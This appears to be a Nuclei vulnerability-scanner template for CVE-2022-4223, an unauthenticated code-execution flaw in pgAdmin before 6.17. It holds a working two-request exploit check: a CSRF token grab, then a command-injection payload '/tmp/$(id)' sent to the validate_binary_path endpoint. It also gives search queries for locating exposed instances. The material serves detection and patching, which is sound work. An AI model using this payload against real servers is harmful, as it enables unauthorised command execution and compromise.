id: CVE-2022-4223 info: name: pgAdmin < 6.17 - Unauthenticated Remote Code Execution author: 0x_Akoko severity: critical description: | pgAdmin prior to 6.17 contains an insecure HTTP API caused by improper access control, letting unauthenticated users execute arbitrary external utilities via path manipulation, exploit requires no authentication. impact: | Attackers can execute arbitrary external utilities on the server, potentially leading to remote code execution or system compromise. remediation: | Update to version 6.17 or later to fix the security issue. reference: - https://github.com/advisories/GHSA-3v6v-2x6p-32mc - https://nvd.nist.gov/vuln/detail/CVE-2022-4223 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4223 epss-score: 0.80069 epss-percentile: 0.99565 cwe-id: CWE-94,CWE-862 metadata: verified: true max-request: 2 shodan-query: http.title:"pgAdmin" fofa-query: title="pgAdmin" tags: cve,cve2022,pgadmin,rce,unauth flow: http(1) && http(2) http: - raw: - | GET /login HTTP/1.1 Host: {{Hostname}} extractors: - type: regex name: csrf part: body group: 1 regex: - 'name="csrf_token"[^>]*value="([^"]+)"' internal: true - raw: - | POST /misc/validate_binary_path HTTP/1.1 Host: {{Hostname}} Content-Type: application/json X-pgA-CSRFToken: {{csrf}} Referer: {{RootURL}}/browser/ {"utility_path":"/tmp/$(id)"} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_all(body, "uid=", "gid=")' condition: and extractors: - type: regex part: body regex: - 'uid=[0-9]+\([a-zA-Z0-9_-]+\)\s*gid=[0-9]+\([a-zA-Z0-9_-]+\)' # digest: 4a0a0047304502200a68e9b31ebdc7b60656e8035e5e1cde9fdb7d962f6e417fb972bf0a957d1dea022100aa8399d6c5d9e08c3578a50d4ae82699c887ea4a84454912a25247848767ac56:922c64590222798bb761d5b6d8e72950